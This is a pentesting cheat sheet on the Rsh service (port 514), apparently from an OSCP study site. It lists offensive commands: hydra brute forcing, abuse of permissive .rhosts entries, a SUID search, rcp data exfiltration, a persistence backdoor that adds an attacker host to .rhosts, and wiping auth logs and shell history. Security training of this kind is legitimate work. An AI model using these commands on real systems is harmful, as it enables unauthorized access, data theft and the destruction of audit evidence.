Rsh - Port 514
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic Info
For authentication, .rhosts files along with /etc/hosts.equiv were utilized by Rsh. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.
Moreover, it was common for the .rhosts files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.
Default port: 514
Login
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>
Attack Vectorsβ
Exploiting Weak Authenticationβ
Check for weak authentication mechanisms. RSH often relies on the .rhosts
file for authentication, which can be easily exploited if not properly configured.
Brute Force Attacksβ
You can perform brute-force attacks to guess weak passwords using tools like hydra
:
hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh
This command attempts to brute-force the specified RSH server.
Exploiting Misconfigurationsβ
Look for misconfigured .rhosts
files that allow unauthorized access. For example, a .rhosts
file with the following entry can be exploited:
+ +
This entry allows any user from any host to log in without a password.
Post-Exploitationβ
Privilege Escalationβ
After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:
rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null
This command lists all SUID binaries, which could potentially be exploited for privilege escalation.
Data Exfiltrationβ
Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp
(remote copy) command:
rcp <remote-server-ip>:<remote-file-path> <local-file-path>
Persistent Accessβ
To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys
file or modify the .rhosts
file to allow your host:
echo "attacker-ip attacker-user" >> ~/.rhosts
This entry grants login permissions to the specified user on the attacker's IP address.
Covering Tracksβ
It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:
rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c
These commands clear the authentication log and command history.
Learn & practice For the OSCP.
Last updated
Was this helpful?